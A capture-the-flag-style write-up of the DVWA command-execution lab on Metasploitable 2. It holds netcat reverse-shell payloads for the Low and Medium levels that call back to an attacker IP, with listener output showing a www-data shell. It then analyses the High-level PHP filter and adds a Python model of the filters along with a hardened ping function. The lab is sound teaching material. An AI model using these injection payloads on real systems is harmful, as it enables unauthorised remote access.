DVWA: Command Execution
Command Execution
Target basics
DVWA running inside Metasploitable 2
Level: Low
Crafted input:
;nc -e /bin/bash 192.168.176.128 5555
where 192.168.176.128 is the IP address of the Kali Linux attacker. The leading ; terminates the ping command the page builds and starts a second command; nc -e (supported by netcat-traditional, which Metasploitable 2 ships, but not by the OpenBSD netcat) connects /bin/bash back to a listener on Kali.
A shell comes back:
┌──(root💀kali)-[~/Desktop]
└─# nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.176.128] from (UNKNOWN) [192.168.176.129] 51191
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$
Level: Medium
Testing shows that the Medium-level filter can be bypassed with the pipe character |:
For example:
127.0.0.1 | ls
返回:
help
index.php
source
So craft the following input to get a shell on the target:
127.0.0.1 | nc -e /bin/bash 192.168.176.128 5555
The target's shell is obtained:
┌──(root💀kali)-[~/Desktop]
└─# nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.176.128] from (UNKNOWN) [192.168.176.129] 53321
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$
Level: High
Entering:
127.0.0.1 && ls
returns:
ERROR: You have entered an invalid IP
Looking at the source code:
<?php
if( isset( $_POST[ 'submit' ] ) ) {
    $target = $_REQUEST["ip"];
    $target = stripslashes( $target );

    // Split the IP into 4 octets
    $octet = explode(".", $target);

    // Check IF each octet is an integer
    if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4) ) {
        // If all 4 octets are ints put the IP back together.
        $target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];

        // Determine OS and execute the ping command.
        if (stristr(php_uname('s'), 'Windows NT')) {
            $cmd = shell_exec( 'ping ' . $target );
            echo '<pre>'.$cmd.'</pre>';
        } else {
            $cmd = shell_exec( 'ping -c 3 ' . $target );
            echo '<pre>'.$cmd.'</pre>';
        }
    }
    else {
        echo '<pre>ERROR: You have entered an invalid IP</pre>';
    }
}
?>
At the High security level there is no longer a command injection: the input is split on ".", exactly four pieces are required, each piece must pass is_numeric(), and the address handed to shell_exec() is rebuilt from those pieces alone, so shell metacharacters such as ;, | or && never reach the shell. Note that is_numeric() is looser than an octet check (it accepts leading whitespace, a sign and exponent forms such as 1e3), so this code is injection-proof rather than a strict IP validator; a tighter fix would validate with filter_var($target, FILTER_VALIDATE_IP) and still wrap the value in escapeshellarg() before building the command.
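The following is an added example, not code from the original post or from DVWA: a small Python model of how each of the three levels treats the ip parameter before it reaches shell_exec(), with the three payloads from this write-up embedded as constructed inputs, plus a hardened version for comparison. The Low level passes input through unchanged and the High level is a port of the PHP above; the Medium blacklist (stripping && and ;) comes from DVWA 1.0.7's source, which this write-up does not reproduce, and is stated here as an assumption. The php_is_numeric() helper approximates PHP's is_numeric() and deliberately ignores PHP 5's hex form.

```python
import ipaddress
import re
import subprocess

# Constructed inputs for this example: the payloads used in the write-up plus a benign address.
BENIGN = "127.0.0.1"
LOW_PAYLOAD = ";nc -e /bin/bash 192.168.176.128 5555"
MEDIUM_PAYLOAD = "127.0.0.1 | nc -e /bin/bash 192.168.176.128 5555"
HIGH_PROBE = "127.0.0.1 && ls"

PREFIX = "ping -c 3 "

# Shell metacharacters that would let a second command run under shell_exec().
SHELL_META = re.compile(r"[;&|`$()<>\n]")

# Approximation of PHP is_numeric(): optional leading whitespace, sign, digits,
# optional fraction and exponent. PHP 5's hex form ("0x1A") is not modelled.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_is_numeric(s):
    return _PHP_NUMERIC.match(s) is not None


def filter_low(target):
    """Low: the input is concatenated into the command unchanged."""
    return target


def filter_medium(target):
    """Medium (assumption: DVWA 1.0.7 blacklist, not shown in the write-up):
    strip '&&' and ';' only. Other separators such as '|' pass straight through."""
    return target.replace("&&", "").replace(";", "")


def filter_high(target):
    """High: port of the PHP shown above. Split on '.', require exactly four
    is_numeric() pieces, rebuild the address from those pieces. None = rejected."""
    octets = target.split(".")
    if len(octets) == 4 and all(php_is_numeric(o) for o in octets):
        return ".".join(octets)
    return None


FILTERS = {"low": filter_low, "medium": filter_medium, "high": filter_high}


def build_command(level, target):
    """The string shell_exec() would receive at this level, or None if rejected."""
    filtered = FILTERS[level](target)
    if filtered is None:
        return None
    return PREFIX + filtered


def injectable(level, target):
    """True when shell metacharacters survive the level's filter and reach the shell."""
    cmd = build_command(level, target)
    return cmd is not None and SHELL_META.search(cmd[len(PREFIX):]) is not None


def safe_ping_argv(target):
    """Hardened form: strict IP validation plus an argv list, so no shell parses
    the input. Raises ValueError for anything that is not a literal IP address."""
    ip = ipaddress.ip_address(target)
    return ["ping", "-c", "3", str(ip)]


def hardened_accepts(target):
    try:
        safe_ping_argv(target)
        return True
    except ValueError:
        return False


def safe_ping(target):
    """Run the hardened command with shell=False; only for callers that want real output."""
    return subprocess.run(safe_ping_argv(target), capture_output=True, text=True).stdout


if __name__ == "__main__":
    for level in FILTERS:
        for payload in (BENIGN, LOW_PAYLOAD, MEDIUM_PAYLOAD, HIGH_PROBE):
            print(f"{level:6} {payload!r:52} -> {build_command(level, payload)!r} "
                  f"injectable={injectable(level, payload)}")
    for payload in (BENIGN, " 1e1.2.3.4", MEDIUM_PAYLOAD):
        print(f"hardened accepts {payload!r}: {hardened_accepts(payload)}")
```

Running the script prints, for every level, the exact string the shell would see and whether an extra command can ride along: Low accepts the ; payload, Medium drops ; and && but lets the | payload through, and High rejects all three while still accepting a non-address such as " 1e1.2.3.4" that ipaddress refuses, which is the is_numeric() caveat noted above.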
STRIVE FOR PROGRESS, NOT FOR PERFECTION